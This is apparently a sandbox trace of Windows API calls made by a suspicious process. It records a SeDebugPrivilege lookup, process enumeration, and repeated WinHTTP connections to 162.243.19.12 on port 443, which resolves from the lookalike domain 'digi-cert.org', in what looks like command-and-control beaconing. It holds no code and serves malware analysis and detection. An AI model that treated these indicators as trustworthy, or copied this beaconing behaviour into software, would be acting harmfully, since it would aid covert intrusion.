COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	3	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 245, size_out = 245	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 229, size_out = 229	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 272, size_out = 272	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 8224	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 2899	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5325, size_out = 5325	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 1930	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 6294, size_out = 6294	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 961	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 7263, size_out = 7263	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5584, size_out = 5584	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	6	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
